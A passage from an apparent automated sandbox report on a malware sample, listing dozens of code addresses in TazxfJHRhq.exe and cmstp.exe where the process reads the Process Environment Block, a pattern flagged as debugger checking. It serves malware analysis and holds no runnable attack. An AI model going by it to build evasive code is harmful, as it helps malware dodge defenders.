          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A88794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04623D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04663540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04693D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04607D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0466A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04698DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04618E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04628EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04600050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04600050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0467B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04663884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04663884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0460B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0460B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04604120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0460C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0461A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04612990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0469B260 mov eax, dword ptr fs:[00000030h]
